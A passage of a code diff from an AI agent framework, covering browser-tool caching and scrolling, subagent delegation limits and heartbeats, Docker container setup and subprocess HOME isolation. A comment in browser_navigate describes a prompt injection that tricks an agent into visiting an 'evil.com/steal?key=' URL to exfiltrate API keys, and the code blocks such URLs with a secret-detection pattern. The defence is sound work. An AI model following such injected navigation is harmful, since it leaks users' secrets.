from gateway.run import GatewayRunner
|
||||
|
||||
loop = asyncio.new_event_loop()
|
||||
try:
|
||||
with patch("gateway.status.remove_pid_file"), \
|
||||
patch("gateway.status.write_runtime_status"), \
|
||||
patch("tools.terminal_tool.cleanup_all_environments"), \
|
||||
patch("tools.browser_tool.cleanup_all_browsers"):
|
||||
loop.run_until_complete(GatewayRunner.stop(runner))
|
||||
finally:
|
||||
loop.close()
|
||||
|
||||
mock_agent_1.close.assert_called()
|
||||
mock_agent_2.close.assert_called()
|
||||
|
||||
def test_evict_does_not_call_close(self):
|
||||
"""_evict_cached_agent() should NOT call close() — it's also used
|
||||
for non-destructive refreshes (model switch, branch, fallback)."""
|
||||
import threading
|
||||
from unittest.mock import MagicMock
|
||||
|
||||
from gateway.run import GatewayRunner
|
||||
|
||||
runner = object.__new__(GatewayRunner)
|
||||
runner._agent_cache_lock = threading.Lock()
|
||||
|
||||
mock_agent = MagicMock()
|
||||
runner._agent_cache = {"session-key": (mock_agent, 12345)}
|
||||
|
||||
GatewayRunner._evict_cached_agent(runner, "session-key")
|
||||
|
||||
mock_agent.close.assert_not_called()
|
||||
assert "session-key" not in runner._agent_cache
|
||||
|
||||
|
||||
class TestDelegationCleanup:
|
||||
"""Verify subagent delegation cleans up child agents."""
|
||||
|
||||
def test_run_single_child_calls_close(self):
|
||||
"""_run_single_child finally block should call close() on child."""
|
||||
from unittest.mock import MagicMock
|
||||
from tools.delegate_tool import _run_single_child
|
||||
|
||||
parent = MagicMock()
|
||||
parent._active_children = []
|
||||
parent._active_children_lock = threading.Lock()
|
||||
|
||||
child = MagicMock()
|
||||
child._delegate_saved_tool_names = ["tool1"]
|
||||
child.run_conversation.side_effect = RuntimeError("test abort")
|
||||
|
||||
parent._active_children.append(child)
|
||||
|
||||
result = _run_single_child(
|
||||
task_index=0,
|
||||
goal="test goal",
|
||||
child=child,
|
||||
parent_agent=parent,
|
||||
)
|
||||
|
||||
child.close.assert_called_once()
|
||||
assert child not in parent._active_children
|
||||
assert result["status"] == "error"
|
||||
+119
-61
@@ -50,6 +50,7 @@ Usage:
|
||||
"""
|
||||
|
||||
import atexit
|
||||
import functools
|
||||
import json
|
||||
import logging
|
||||
import os
|
||||
@@ -100,27 +101,27 @@ _SANE_PATH = (
|
||||
)
|
||||
|
||||
|
||||
def _discover_homebrew_node_dirs() -> list[str]:
|
||||
@functools.lru_cache(maxsize=1)
|
||||
def _discover_homebrew_node_dirs() -> tuple[str, ...]:
|
||||
"""Find Homebrew versioned Node.js bin directories (e.g. node@20, node@24).
|
||||
|
||||
When Node is installed via ``brew install node@24`` and NOT linked into
|
||||
/opt/homebrew/bin, the binary lives only in /opt/homebrew/opt/node@24/bin/.
|
||||
This function discovers those paths so they can be added to subprocess PATH.
|
||||
/opt/homebrew/bin, agent-browser isn't discoverable on the default PATH.
|
||||
This function finds those directories so they can be prepended.
|
||||
"""
|
||||
dirs: list[str] = []
|
||||
homebrew_opt = "/opt/homebrew/opt"
|
||||
if not os.path.isdir(homebrew_opt):
|
||||
return dirs
|
||||
return tuple(dirs)
|
||||
try:
|
||||
for entry in os.listdir(homebrew_opt):
|
||||
if entry.startswith("node") and entry != "node":
|
||||
# e.g. node@20, node@24
|
||||
bin_dir = os.path.join(homebrew_opt, entry, "bin")
|
||||
if os.path.isdir(bin_dir):
|
||||
dirs.append(bin_dir)
|
||||
except OSError:
|
||||
pass
|
||||
return dirs
|
||||
return tuple(dirs)
|
||||
|
||||
# Throttle screenshot cleanup to avoid repeated full directory scans.
|
||||
_last_screenshot_cleanup_by_dir: dict[str, float] = {}
|
||||
@@ -132,28 +133,39 @@ _last_screenshot_cleanup_by_dir: dict[str, float] = {}
|
||||
# Default timeout for browser commands (seconds)
|
||||
DEFAULT_COMMAND_TIMEOUT = 30
|
||||
|
||||
# Default session timeout (seconds)
|
||||
DEFAULT_SESSION_TIMEOUT = 300
|
||||
|
||||
# Max tokens for snapshot content before summarization
|
||||
SNAPSHOT_SUMMARIZE_THRESHOLD = 8000
|
||||
|
||||
# Commands that legitimately return empty stdout (e.g. close, record).
|
||||
_EMPTY_OK_COMMANDS: frozenset = frozenset({"close", "record"})
|
||||
|
||||
_cached_command_timeout: Optional[int] = None
|
||||
_command_timeout_resolved = False
|
||||
|
||||
|
||||
def _get_command_timeout() -> int:
|
||||
"""Return the configured browser command timeout from config.yaml.
|
||||
|
||||
Reads ``config["browser"]["command_timeout"]`` and falls back to
|
||||
``DEFAULT_COMMAND_TIMEOUT`` (30s) if unset or unreadable.
|
||||
``DEFAULT_COMMAND_TIMEOUT`` (30s) if unset or unreadable. Result is
|
||||
cached after the first call and cleared by ``cleanup_all_browsers()``.
|
||||
"""
|
||||
global _cached_command_timeout, _command_timeout_resolved
|
||||
if _command_timeout_resolved:
|
||||
return _cached_command_timeout # type: ignore[return-value]
|
||||
|
||||
_command_timeout_resolved = True
|
||||
result = DEFAULT_COMMAND_TIMEOUT
|
||||
try:
|
||||
from hermes_cli.config import read_raw_config
|
||||
cfg = read_raw_config()
|
||||
val = cfg.get("browser", {}).get("command_timeout")
|
||||
if val is not None:
|
||||
return max(int(val), 5) # Floor at 5s to avoid instant kills
|
||||
result = max(int(val), 5) # Floor at 5s to avoid instant kills
|
||||
except Exception as e:
|
||||
logger.debug("Could not read command_timeout from config: %s", e)
|
||||
return DEFAULT_COMMAND_TIMEOUT
|
||||
_cached_command_timeout = result
|
||||
return result
|
||||
|
||||
|
||||
def _get_vision_model() -> Optional[str]:
|
||||
@@ -239,6 +251,8 @@ _cached_cloud_provider: Optional[CloudBrowserProvider] = None
|
||||
_cloud_provider_resolved = False
|
||||
_allow_private_urls_resolved = False
|
||||
_cached_allow_private_urls: Optional[bool] = None
|
||||
_cached_agent_browser: Optional[str] = None
|
||||
_agent_browser_resolved = False
|
||||
|
||||
|
||||
def _get_cloud_provider() -> Optional[CloudBrowserProvider]:
|
||||
@@ -415,7 +429,7 @@ def _emergency_cleanup_all_sessions():
|
||||
with _cleanup_lock:
|
||||
_active_sessions.clear()
|
||||
_session_last_activity.clear()
|
||||
_recording_sessions.clear()
|
||||
_recording_sessions.clear()
|
||||
|
||||
|
||||
# Register cleanup via atexit only. Previous versions installed SIGINT/SIGTERM
|
||||
@@ -617,15 +631,6 @@ BROWSER_TOOL_SCHEMAS = [
|
||||
"required": ["key"]
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "browser_close",
|
||||
"description": "Close the browser session and release resources. Call this when done with browser tasks to free up cloud browser session quota.",
|
||||
"parameters": {
|
||||
"type": "object",
|
||||
"properties": {},
|
||||
"required": []
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "browser_get_images",
|
||||
"description": "Get a list of all images on the current page with their URLs and alt text. Useful for finding images to analyze with the vision tool. Requires browser_navigate to be called first.",
|
||||
@@ -777,10 +782,26 @@ def _find_agent_browser() -> str:
|
||||
Raises:
|
||||
FileNotFoundError: If agent-browser is not installed
|
||||
"""
|
||||
global _cached_agent_browser, _agent_browser_resolved
|
||||
if _agent_browser_resolved:
|
||||
if _cached_agent_browser is None:
|
||||
raise FileNotFoundError(
|
||||
"agent-browser CLI not found (cached). Install it with: "
|
||||
f"{_browser_install_hint()}\n"
|
||||
"Or run 'npm install' in the repo root to install locally.\n"
|
||||
"Or ensure npx is available in your PATH."
|
||||
)
|
||||
return _cached_agent_browser
|
||||
|
||||
# Note: _agent_browser_resolved is set at each return site below
|
||||
# (not before the search) to prevent a race where a concurrent thread
|
||||
# sees resolved=True but _cached_agent_browser is still None.
|
||||
|
||||
# Check if it's in PATH (global install)
|
||||
which_result = shutil.which("agent-browser")
|
||||
if which_result:
|
||||
_cached_agent_browser = which_result
|
||||
_agent_browser_resolved = True
|
||||
return which_result
|
||||
|
||||
# Build an extended search PATH including Homebrew and Hermes-managed dirs.
|
||||
@@ -800,21 +821,29 @@ def _find_agent_browser() -> str:
|
||||
extended_path = os.pathsep.join(extra_dirs)
|
||||
which_result = shutil.which("agent-browser", path=extended_path)
|
||||
if which_result:
|
||||
_cached_agent_browser = which_result
|
||||
_agent_browser_resolved = True
|
||||
return which_result
|
||||
|
||||
# Check local node_modules/.bin/ (npm install in repo root)
|
||||
repo_root = Path(__file__).parent.parent
|
||||
local_bin = repo_root / "node_modules" / ".bin" / "agent-browser"
|
||||
if local_bin.exists():
|
||||
return str(local_bin)
|
||||
_cached_agent_browser = str(local_bin)
|
||||
_agent_browser_resolved = True
|
||||
return _cached_agent_browser
|
||||
|
||||
# Check common npx locations (also search extended dirs)
|
||||
npx_path = shutil.which("npx")
|
||||
if not npx_path and extra_dirs:
|
||||
npx_path = shutil.which("npx", path=os.pathsep.join(extra_dirs))
|
||||
if npx_path:
|
||||
return "npx agent-browser"
|
||||
_cached_agent_browser = "npx agent-browser"
|
||||
_agent_browser_resolved = True
|
||||
return _cached_agent_browser
|
||||
|
||||
# Nothing found — cache the failure so subsequent calls don't re-scan.
|
||||
_agent_browser_resolved = True
|
||||
raise FileNotFoundError(
|
||||
"agent-browser CLI not found. Install it with: "
|
||||
f"{_browser_install_hint()}\n"
|
||||
@@ -935,7 +964,7 @@ def _run_browser_command(
|
||||
path_parts = [p for p in existing_path.split(":") if p]
|
||||
candidate_dirs = (
|
||||
[hermes_node_bin]
|
||||
+ _discover_homebrew_node_dirs()
|
||||
+ list(_discover_homebrew_node_dirs())
|
||||
+ [p for p in _SANE_PATH.split(":") if p]
|
||||
)
|
||||
|
||||
@@ -994,15 +1023,15 @@ def _run_browser_command(
|
||||
level = logging.WARNING if returncode != 0 else logging.DEBUG
|
||||
logger.log(level, "browser '%s' stderr: %s", command, stderr.strip()[:500])
|
||||
|
||||
# Log empty output as warning — common sign of broken agent-browser
|
||||
if not stdout.strip() and returncode == 0:
|
||||
logger.warning("browser '%s' returned empty stdout with rc=0. "
|
||||
"cmd=%s stderr=%s",
|
||||
command, " ".join(cmd_parts[:4]) + "...",
|
||||
(stderr or "")[:200])
|
||||
|
||||
stdout_text = stdout.strip()
|
||||
|
||||
# Empty output with rc=0 is a broken state — treat as failure rather
|
||||
# than silently returning {"success": True, "data": {}}.
|
||||
# Some commands (close, record) legitimately return no output.
|
||||
if not stdout_text and returncode == 0 and command not in _EMPTY_OK_COMMANDS:
|
||||
logger.warning("browser '%s' returned empty output (rc=0)", command)
|
||||
return {"success": False, "error": f"Browser command '{command}' returned no output"}
|
||||
|
||||
if stdout_text:
|
||||
try:
|
||||
parsed = json.loads(stdout_text)
|
||||
@@ -1114,20 +1143,34 @@ def _extract_relevant_content(
|
||||
|
||||
|
||||
def _truncate_snapshot(snapshot_text: str, max_chars: int = 8000) -> str:
|
||||
"""
|
||||
Simple truncation fallback for snapshots.
|
||||
|
||||
"""Structure-aware truncation for snapshots.
|
||||
|
||||
Cuts at line boundaries so that accessibility tree elements are never
|
||||
split mid-line, and appends a note telling the agent how much was
|
||||
omitted.
|
||||
|
||||
Args:
|
||||
snapshot_text: The snapshot text to truncate
|
||||
max_chars: Maximum characters to keep
|
||||
|
||||
|
||||
Returns:
|
||||
Truncated text with indicator if truncated
|
||||
"""
|
||||
if len(snapshot_text) <= max_chars:
|
||||
return snapshot_text
|
||||
|
||||
return snapshot_text[:max_chars] + "\n\n[... content truncated ...]"
|
||||
|
||||
lines = snapshot_text.split('\n')
|
||||
result: list[str] = []
|
||||
chars = 0
|
||||
for line in lines:
|
||||
if chars + len(line) + 1 > max_chars - 80: # reserve space for note
|
||||
break
|
||||
result.append(line)
|
||||
chars += len(line) + 1
|
||||
remaining = len(lines) - len(result)
|
||||
if remaining > 0:
|
||||
result.append(f'\n[... {remaining} more lines truncated, use browser_snapshot for full content]')
|
||||
return '\n'.join(result)
|
||||
|
||||
|
||||
# ============================================================================
|
||||
@@ -1148,8 +1191,11 @@ def browser_navigate(url: str, task_id: Optional[str] = None) -> str:
|
||||
# Secret exfiltration protection — block URLs that embed API keys or
|
||||
# tokens in query parameters. A prompt injection could trick the agent
|
||||
# into navigating to https://evil.com/steal?key=sk-ant-... to exfil secrets.
|
||||
# Also check URL-decoded form to catch %2D encoding tricks (e.g. sk%2Dant%2D...).
|
||||
import urllib.parse
|
||||
from agent.redact import _PREFIX_RE
|
||||
if _PREFIX_RE.search(url):
|
||||
url_decoded = urllib.parse.unquote(url)
|
||||
if _PREFIX_RE.search(url) or _PREFIX_RE.search(url_decoded):
|
||||
return json.dumps({
|
||||
"success": False,
|
||||
"error": "Blocked: URL contains what appears to be an API key or token. "
|
||||
@@ -1415,13 +1461,15 @@ def browser_scroll(direction: str, task_id: Optional[str] = None) -> str:
|
||||
"error": f"Invalid direction '{direction}'. Use 'up' or 'down'."
|
||||
}, ensure_ascii=False)
|
||||
|
||||
# Repeat the scroll 5 times to get meaningful page movement.
|
||||
# Most backends scroll ~100px per call, which is barely visible.
|
||||
# 5x gives roughly half a viewport of travel, backend-agnostic.
|
||||
_SCROLL_REPEATS = 5
|
||||
# Single scroll with pixel amount instead of 5x subprocess calls.
|
||||
# agent-browser supports: agent-browser scroll down 500
|
||||
# ~500px is roughly half a viewport of travel.
|
||||
_SCROLL_PIXELS = 500
|
||||
|
||||
if _is_camofox_mode():
|
||||
from tools.browser_camofox import camofox_scroll
|
||||
# Camofox REST API doesn't support pixel args; use repeated calls
|
||||
_SCROLL_REPEATS = 5
|
||||
result = None
|
||||
for _ in range(_SCROLL_REPEATS):
|
||||
result = camofox_scroll(direction, task_id)
|
||||
@@ -1429,14 +1477,12 @@ def browser_scroll(direction: str, task_id: Optional[str] = None) -> str:
|
||||
|
||||
effective_task_id = task_id or "default"
|
||||
|
||||
result = None
|
||||
for _ in range(_SCROLL_REPEATS):
|
||||
result = _run_browser_command(effective_task_id, "scroll", [direction])
|
||||
if not result.get("success"):
|
||||
return json.dumps({
|
||||
"success": False,
|
||||
"error": result.get("error", f"Failed to scroll {direction}")
|
||||
}, ensure_ascii=False)
|
||||
result = _run_browser_command(effective_task_id, "scroll", [direction, str(_SCROLL_PIXELS)])
|
||||
if not result.get("success"):
|
||||
return json.dumps({
|
||||
"success": False,
|
||||
"error": result.get("error", f"Failed to scroll {direction}")
|
||||
}, ensure_ascii=False)
|
||||
|
||||
return json.dumps({
|
||||
"success": True,
|
||||
@@ -1607,11 +1653,11 @@ def _browser_eval(expression: str, task_id: Optional[str] = None) -> str:
|
||||
|
||||
def _camofox_eval(expression: str, task_id: Optional[str] = None) -> str:
|
||||
"""Evaluate JS via Camofox's /tabs/{tab_id}/eval endpoint (if available)."""
|
||||
from tools.browser_camofox import _get_session, _ensure_tab, _post
|
||||
from tools.browser_camofox import _ensure_tab, _post
|
||||
try:
|
||||
session = _get_session(task_id or "default")
|
||||
tab_id = _ensure_tab(session)
|
||||
resp = _post(f"/tabs/{tab_id}/eval", json_data={"expression": expression})
|
||||
tab_info = _ensure_tab(task_id or "default")
|
||||
tab_id = tab_info.get("tab_id") or tab_info.get("id")
|
||||
resp = _post(f"/tabs/{tab_id}/eval", body={"expression": expression})
|
||||
|
||||
# Camofox returns the result in a JSON envelope
|
||||
raw_result = resp.get("result") if isinstance(resp, dict) else resp
|
||||
@@ -1641,8 +1687,9 @@ def _camofox_eval(expression: str, task_id: Optional[str] = None) -> str:
|
||||
|
||||
def _maybe_start_recording(task_id: str):
|
||||
"""Start recording if browser.record_sessions is enabled in config."""
|
||||
if task_id in _recording_sessions:
|
||||
return
|
||||
with _cleanup_lock:
|
||||
if task_id in _recording_sessions:
|
||||
return
|
||||
try:
|
||||
from hermes_cli.config import read_raw_config
|
||||
hermes_home = get_hermes_home()
|
||||
@@ -1662,7 +1709,8 @@ def _maybe_start_recording(task_id: str):
|
||||
|
||||
result = _run_browser_command(task_id, "record", ["start", str(recording_path)])
|
||||
if result.get("success"):
|
||||
_recording_sessions.add(task_id)
|
||||
with _cleanup_lock:
|
||||
_recording_sessions.add(task_id)
|
||||
logger.info("Auto-recording browser session %s to %s", task_id, recording_path)
|
||||
else:
|
||||
logger.debug("Could not start auto-recording: %s", result.get("error"))
|
||||
@@ -1672,8 +1720,9 @@ def _maybe_start_recording(task_id: str):
|
||||
|
||||
def _maybe_stop_recording(task_id: str):
|
||||
"""Stop recording if one is active for this session."""
|
||||
if task_id not in _recording_sessions:
|
||||
return
|
||||
with _cleanup_lock:
|
||||
if task_id not in _recording_sessions:
|
||||
return
|
||||
try:
|
||||
result = _run_browser_command(task_id, "record", ["stop"])
|
||||
if result.get("success"):
|
||||
@@ -1682,7 +1731,8 @@ def _maybe_stop_recording(task_id: str):
|
||||
except Exception as e:
|
||||
logger.debug("Could not stop recording for %s: %s", task_id, e)
|
||||
finally:
|
||||
_recording_sessions.discard(task_id)
|
||||
with _cleanup_lock:
|
||||
_recording_sessions.discard(task_id)
|
||||
|
||||
|
||||
def browser_get_images(task_id: Optional[str] = None) -> str:
|
||||
@@ -2041,6 +2091,14 @@ def cleanup_all_browsers() -> None:
|
||||
for task_id in task_ids:
|
||||
cleanup_browser(task_id)
|
||||
|
||||
# Reset cached lookups so they are re-evaluated on next use.
|
||||
global _cached_agent_browser, _agent_browser_resolved
|
||||
global _cached_command_timeout, _command_timeout_resolved
|
||||
_cached_agent_browser = None
|
||||
_agent_browser_resolved = False
|
||||
_discover_homebrew_node_dirs.cache_clear()
|
||||
_cached_command_timeout = None
|
||||
_command_timeout_resolved = False
|
||||
|
||||
|
||||
# ============================================================================
|
||||
|
||||
@@ -1020,6 +1020,13 @@ def execute_code(
|
||||
if _tz_name:
|
||||
child_env["TZ"] = _tz_name
|
||||
|
||||
# Per-profile HOME isolation: redirect system tool configs into
|
||||
# {HERMES_HOME}/home/ when that directory exists.
|
||||
from hermes_constants import get_subprocess_home
|
||||
_profile_home = get_subprocess_home()
|
||||
if _profile_home:
|
||||
child_env["HOME"] = _profile_home
|
||||
|
||||
proc = subprocess.Popen(
|
||||
[sys.executable, "script.py"],
|
||||
cwd=tmpdir,
|
||||
|
||||
@@ -64,14 +64,15 @@ def _scan_cron_prompt(prompt: str) -> str:
|
||||
|
||||
|
||||
def _origin_from_env() -> Optional[Dict[str, str]]:
|
||||
origin_platform = os.getenv("HERMES_SESSION_PLATFORM")
|
||||
origin_chat_id = os.getenv("HERMES_SESSION_CHAT_ID")
|
||||
from gateway.session_context import get_session_env
|
||||
origin_platform = get_session_env("HERMES_SESSION_PLATFORM")
|
||||
origin_chat_id = get_session_env("HERMES_SESSION_CHAT_ID")
|
||||
if origin_platform and origin_chat_id:
|
||||
return {
|
||||
"platform": origin_platform,
|
||||
"chat_id": origin_chat_id,
|
||||
"chat_name": os.getenv("HERMES_SESSION_CHAT_NAME"),
|
||||
"thread_id": os.getenv("HERMES_SESSION_THREAD_ID"),
|
||||
"chat_name": get_session_env("HERMES_SESSION_CHAT_NAME") or None,
|
||||
"thread_id": get_session_env("HERMES_SESSION_THREAD_ID") or None,
|
||||
}
|
||||
return None
|
||||
|
||||
|
||||
+96
-5
@@ -20,6 +20,7 @@ import json
|
||||
import logging
|
||||
logger = logging.getLogger(__name__)
|
||||
import os
|
||||
import threading
|
||||
import time
|
||||
from concurrent.futures import ThreadPoolExecutor, as_completed
|
||||
from typing import Any, Dict, List, Optional
|
||||
@@ -34,9 +35,36 @@ DELEGATE_BLOCKED_TOOLS = frozenset([
|
||||
"execute_code", # children should reason step-by-step, not write scripts
|
||||
])
|
||||
|
||||
MAX_CONCURRENT_CHILDREN = 3
|
||||
_DEFAULT_MAX_CONCURRENT_CHILDREN = 3
|
||||
MAX_DEPTH = 2 # parent (0) -> child (1) -> grandchild rejected (2)
|
||||
|
||||
|
||||
def _get_max_concurrent_children() -> int:
|
||||
"""Read delegation.max_concurrent_children from config, falling back to
|
||||
DELEGATION_MAX_CONCURRENT_CHILDREN env var, then the default (3).
|
||||
|
||||
Uses the same ``_load_config()`` path that the rest of ``delegate_task``
|
||||
uses, keeping config priority consistent (config.yaml > env > default).
|
||||
"""
|
||||
cfg = _load_config()
|
||||
val = cfg.get("max_concurrent_children")
|
||||
if val is not None:
|
||||
try:
|
||||
return max(1, int(val))
|
||||
except (TypeError, ValueError):
|
||||
logger.warning(
|
||||
"delegation.max_concurrent_children=%r is not a valid integer; "
|
||||
"using default %d", val, _DEFAULT_MAX_CONCURRENT_CHILDREN,
|
||||
)
|
||||
env_val = os.getenv("DELEGATION_MAX_CONCURRENT_CHILDREN")
|
||||
if env_val:
|
||||
try:
|
||||
return max(1, int(env_val))
|
||||
except (TypeError, ValueError):
|
||||
pass
|
||||
return _DEFAULT_MAX_CONCURRENT_CHILDREN
|
||||
DEFAULT_MAX_ITERATIONS = 50
|
||||
_HEARTBEAT_INTERVAL = 30 # seconds between parent activity heartbeats during delegation
|
||||
DEFAULT_TOOLSETS = ["terminal", "file", "web"]
|
||||
|
||||
|
||||
@@ -369,6 +397,44 @@ def _run_single_child(
|
||||
except Exception as exc:
|
||||
logger.debug("Failed to bind child to leased credential: %s", exc)
|
||||
|
||||
# Heartbeat: periodically propagate child activity to the parent so the
|
||||
# gateway inactivity timeout doesn't fire while the subagent is working.
|
||||
# Without this, the parent's _last_activity_ts freezes when delegate_task
|
||||
# starts and the gateway eventually kills the agent for "no activity".
|
||||
_heartbeat_stop = threading.Event()
|
||||
|
||||
def _heartbeat_loop():
|
||||
while not _heartbeat_stop.wait(_HEARTBEAT_INTERVAL):
|
||||
if parent_agent is None:
|
||||
continue
|
||||
touch = getattr(parent_agent, '_touch_activity', None)
|
||||
if not touch:
|
||||
continue
|
||||
# Pull detail from the child's own activity tracker
|
||||
desc = f"delegate_task: subagent {task_index} working"
|
||||
try:
|
||||
child_summary = child.get_activity_summary()
|
||||
child_tool = child_summary.get("current_tool")
|
||||
child_iter = child_summary.get("api_call_count", 0)
|
||||
child_max = child_summary.get("max_iterations", 0)
|
||||
if child_tool:
|
||||
desc = (f"delegate_task: subagent running {child_tool} "
|
||||
f"(iteration {child_iter}/{child_max})")
|
||||
else:
|
||||
child_desc = child_summary.get("last_activity_desc", "")
|
||||
if child_desc:
|
||||
desc = (f"delegate_task: subagent {child_desc} "
|
||||
f"(iteration {child_iter}/{child_max})")
|
||||
except Exception:
|
||||
pass
|
||||
try:
|
||||
touch(desc)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
_heartbeat_thread = threading.Thread(target=_heartbeat_loop, daemon=True)
|
||||
_heartbeat_thread.start()
|
||||
|
||||
try:
|
||||
result = child.run_conversation(user_message=goal)
|
||||
|
||||
@@ -479,6 +545,11 @@ def _run_single_child(
|
||||
}
|
||||
|
||||
finally:
|
||||
# Stop the heartbeat thread so it doesn't keep touching parent activity
|
||||
# after the child has finished (or failed).
|
||||
_heartbeat_stop.set()
|
||||
_heartbeat_thread.join(timeout=5)
|
||||
|
||||
if child_pool is not None and leased_cred_id is not None:
|
||||
try:
|
||||
child_pool.release_lease(leased_cred_id)
|
||||
@@ -507,6 +578,15 @@ def _run_single_child(
|
||||
except (ValueError, UnboundLocalError) as e:
|
||||
logger.debug("Could not remove child from active_children: %s", e)
|
||||
|
||||
# Close tool resources (terminal sandboxes, browser daemons,
|
||||
# background processes, httpx clients) so subagent subprocesses
|
||||
# don't outlive the delegation.
|
||||
try:
|
||||
if hasattr(child, 'close'):
|
||||
child.close()
|
||||
except Exception:
|
||||
logger.debug("Failed to close child agent after delegation")
|
||||
|
||||
def delegate_task(
|
||||
goal: Optional[str] = None,
|
||||
context: Optional[str] = None,
|
||||
@@ -555,8 +635,17 @@ def delegate_task(
|
||||
return tool_error(str(exc))
|
||||
|
||||
# Normalize to task list
|
||||
max_children = _get_max_concurrent_children()
|
||||
if tasks and isinstance(tasks, list):
|
||||
task_list = tasks[:MAX_CONCURRENT_CHILDREN]
|
||||
if len(tasks) > max_children:
|
||||
return tool_error(
|
||||
f"Too many tasks: {len(tasks)} provided, but "
|
||||
f"max_concurrent_children is {max_children}. "
|
||||
f"Either reduce the task count, split into multiple "
|
||||
f"delegate_task calls, or increase "
|
||||
f"delegation.max_concurrent_children in config.yaml."
|
||||
)
|
||||
task_list = tasks
|
||||
elif goal and isinstance(goal, str) and goal.strip():
|
||||
task_list = [{"goal": goal, "context": context, "toolsets": toolsets}]
|
||||
else:
|
||||
@@ -616,7 +705,7 @@ def delegate_task(
|
||||
completed_count = 0
|
||||
spinner_ref = getattr(parent_agent, '_delegate_spinner', None)
|
||||
|
||||
with ThreadPoolExecutor(max_workers=MAX_CONCURRENT_CHILDREN) as executor:
|
||||
with ThreadPoolExecutor(max_workers=max_children) as executor:
|
||||
futures = {}
|
||||
for i, t, child in children:
|
||||
future = executor.submit(
|
||||
@@ -920,9 +1009,11 @@ DELEGATE_TASK_SCHEMA = {
|
||||
},
|
||||
"required": ["goal"],
|
||||
},
|
||||
"maxItems": 3,
|
||||
# No maxItems — the runtime limit is configurable via
|
||||
# delegation.max_concurrent_children (default 3) and
|
||||
# enforced with a clear error in delegate_task().
|
||||
"description": (
|
||||
"Batch mode: up to 3 tasks to run in parallel. Each gets "
|
||||
"Batch mode: tasks to run in parallel (limit configurable via delegation.max_concurrent_children, default 3). Each gets "
|
||||
"its own subagent with isolated context and terminal session. "
|
||||
"When provided, top-level goal/context/toolsets are ignored."
|
||||
),
|
||||
|
||||
@@ -409,11 +409,12 @@ class DockerEnvironment(BaseEnvironment):
|
||||
container_name = f"hermes-{uuid.uuid4().hex[:8]}"
|
||||
run_cmd = [
|
||||
self._docker_exe, "run", "-d",
|
||||
"--init", # tini/catatonit as PID 1 — reaps zombie children
|
||||
"--name", container_name,
|
||||
"-w", cwd,
|
||||
*all_run_args,
|
||||
image,
|
||||
"sleep", "2h",
|
||||
"sleep", "infinity", # no fixed lifetime — idle reaper handles cleanup
|
||||
]
|
||||
logger.debug(f"Starting container: {' '.join(run_cmd)}")
|
||||
result = subprocess.run(
|
||||
|
||||
@@ -129,6 +129,12 @@ def _sanitize_subprocess_env(base_env: dict | None, extra_env: dict | None = Non
|
||||
elif key not in _HERMES_PROVIDER_ENV_BLOCKLIST or _is_passthrough(key):
|
||||
sanitized[key] = value
|
||||
|
||||
# Per-profile HOME isolation for background processes (same as _make_run_env).
|
||||
from hermes_constants import get_subprocess_home
|
||||
_profile_home = get_subprocess_home()
|
||||
if _profile_home:
|
||||
sanitized["HOME"] = _profile_home
|
||||
|
||||
return sanitized
|
||||
|
||||
|
||||
@@ -195,6 +201,15 @@ def _make_run_env(env: dict) -> dict:
|
||||
existing_path = run_env.get("PATH", "")
|
||||
if "/usr/bin" not in existing_path.split(":"):
|
||||
run_env["PATH"] = f"{existing_path}:{_SANE_PATH}" if existing_path else _SANE_PATH
|
||||
|
||||
# Per-profile HOME isolation: redirect system tool configs (git, ssh, gh,
|
||||
# npm …) into {HERMES_HOME}/home/ when that directory exists. Only the
|
||||
# subprocess sees the override — the Python process keeps the real HOME.
|
||||
from hermes_constants import get_subprocess_home
|
||||
_profile_home = get_subprocess_home()
|
||||
if _profile_home:
|
||||
run_env["HOME"] = _profile_home
|
||||
|
||||
return run_env
|
||||
|
||||
|
||||
|
||||
@@ -252,23 +252,43 @@ class FileOperations(ABC):
|
||||
def read_file(self, path: str, offset: int = 1, limit: int = 500) -> ReadResult:
|
||||
"""Read a file with pagination support."""
|
||||
...
|
||||
|
||||
|
||||
@abstractmethod
|
||||
def read_file_raw(self, path: str) -> ReadResult:
|
||||
"""Read the complete file content as a plain string.
|
||||
|
||||
No pagination, no line-number prefixes, no per-line truncation.
|
||||
Returns ReadResult with .content = full file text, .error set on
|
||||
failure. Always reads to EOF regardless of file size.
|
||||
"""
|
||||
...
|
||||
|
||||
@abstractmethod
|
||||
def write_file(self, path: str, content: str) -> WriteResult:
|
||||
"""Write content to a file, creating directories as needed."""
|
||||
...
|
||||
|
||||
|
||||
@abstractmethod
|
||||
def patch_replace(self, path: str, old_string: str, new_string: str,
|
||||
def patch_replace(self, path: str, old_string: str, new_string: str,
|
||||
replace_all: bool = False) -> PatchResult:
|
||||
"""Replace text in a file using fuzzy matching."""
|
||||
...
|
||||
|
||||
|
||||
@abstractmethod
|
||||
def patch_v4a(self, patch_content: str) -> PatchResult:
|
||||
"""Apply a V4A format patch."""
|
||||
...
|
||||
|
||||
|
||||
@abstractmethod
|
||||
def delete_file(self, path: str) -> WriteResult:
|
||||
"""Delete a file. Returns WriteResult with .error set on failure."""
|
||||
...
|
||||
|
||||
@abstractmethod
|
||||
def move_file(self, src: str, dst: str) -> WriteResult:
|
||||
"""Move/rename a file from src to dst. Returns WriteResult with .error set on failure."""
|
||||
...
|
||||
|
||||
@abstractmethod
|
||||
def search(self, pattern: str, path: str = ".", target: str = "content",
|
||||
file_glob: Optional[str] = None, limit: int = 50, offset: int = 0,
|
||||
@@ -561,10 +581,62 @@ class ShellFileOperations(FileOperations):
|
||||
similar_files=similar[:5] # Limit to 5 suggestions
|
||||
)
|
||||
|
||||
def read_file_raw(self, path: str) -> ReadResult:
|
||||
"""Read the complete file content as a plain string.
|
||||
|
||||
No pagination, no line-number prefixes, no per-line truncation.
|
||||
Uses cat so the full file is returned regardless of size.
|
||||
"""
|
||||
path = self._expand_path(path)
|
||||
stat_cmd = f"wc -c < {self._escape_shell_arg(path)} 2>/dev/null"
|
||||
stat_result = self._exec(stat_cmd)
|
||||
if stat_result.exit_code != 0:
|
||||
return self._suggest_similar_files(path)
|
||||
try:
|
||||
file_size = int(stat_result.stdout.strip())
|
||||
except ValueError:
|
||||
file_size = 0
|
||||
if self._is_image(path):
|
||||
return ReadResult(is_image=True, is_binary=True, file_size=file_size)
|
||||
sample_result = self._exec(f"head -c 1000 {self._escape_shell_arg(path)} 2>/dev/null")
|
||||
if self._is_likely_binary(path, sample_result.stdout):
|
||||
return ReadResult(
|
||||
is_binary=True, file_size=file_size,
|
||||
